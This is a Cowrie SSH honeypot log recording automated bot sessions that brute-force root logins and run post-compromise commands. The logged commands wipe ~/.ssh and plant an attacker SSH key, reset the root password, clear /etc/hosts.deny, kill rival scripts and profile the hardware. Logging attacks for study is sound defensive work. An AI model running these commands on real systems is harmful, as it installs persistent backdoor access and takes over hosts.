{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:12:40.075388Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:12:40.322999Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty654321","message":"login attempt [root/qwerty654321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:12:41.285192Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:41.829700Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:12:41.830442Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:12:41.831355Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:42.072004Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:42.565936Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:12:42.566720Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:12:42.816947Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:42.817840Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.session.connect","src_ip":"187.107.88.97","src_port":58831,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e0c6adbebeb","protocol":"ssh","message":"New connection: 187.107.88.97:58831 (1.2.3.4:22) [session: 4e0c6adbebeb]","sensor":"my-vps","timestamp":"2025-08-26T13:12:43.076333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:12:43.077104Z","src_ip":"187.107.88.97","session":"4e0c6adbebeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:12:43.336553Z","src_ip":"187.107.88.97","session":"4e0c6adbebeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:44.182407Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:12:44.183110Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:44.403989Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:12:44.441379Z","src_ip":"187.107.88.97","session":"4e0c6adbebeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:44.890839Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"echo \"root:HaBdaAUuph1d\"|chpasswd|bash","message":"CMD: echo \"root:HaBdaAUuph1d\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T13:12:44.891548Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/32198309a20f45682be82b9d1574623a8805335d394db3e6a4f83f0ea8e787a6","size":21,"shasum":"32198309a20f45682be82b9d1574623a8805335d394db3e6a4f83f0ea8e787a6","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/32198309a20f45682be82b9d1574623a8805335d394db3e6a4f83f0ea8e787a6 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.099747Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:45.575001Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.575848Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.733115Z","src_ip":"187.107.88.97","session":"4e0c6adbebeb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.787193Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.788147Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.connect","src_ip":"187.107.88.97","src_port":60805,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc388e06a663","protocol":"ssh","message":"New connection: 187.107.88.97:60805 (1.2.3.4:22) [session: cc388e06a663]","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.991581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:12:45.992572Z","src_ip":"187.107.88.97","session":"cc388e06a663"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:46.321207Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T13:12:46.322090Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:12:46.324482Z","src_ip":"187.107.88.97","session":"cc388e06a663"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:46.531163Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:46.965455Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T13:12:46.966144Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.175009Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.321011Z","src_ip":"187.107.88.97","session":"cc388e06a663"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.577275Z","src_ip":"187.107.88.97","session":"a9d309db90e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.578382Z","src_ip":"187.107.88.97","session":"cc388e06a663"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:47.699265Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.699944Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.700336Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:47.908858Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:48.378092Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T13:12:48.378779Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:48.586534Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:49.019803Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T13:12:49.020681Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:49.228674Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:49.741138Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T13:12:49.741645Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:49.950024Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:50.387089Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:12:50.387903Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:50.596427Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:51.114134Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T13:12:51.114820Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:51.324011Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:51.789341Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T13:12:51.789999Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:51.998100Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:52.433614Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T13:12:52.434290Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:52.643417Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:53.191536Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T13:12:53.192242Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:53.403399Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:53.839638Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T13:12:53.840324Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:54.049926Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:54.565199Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T13:12:54.565915Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
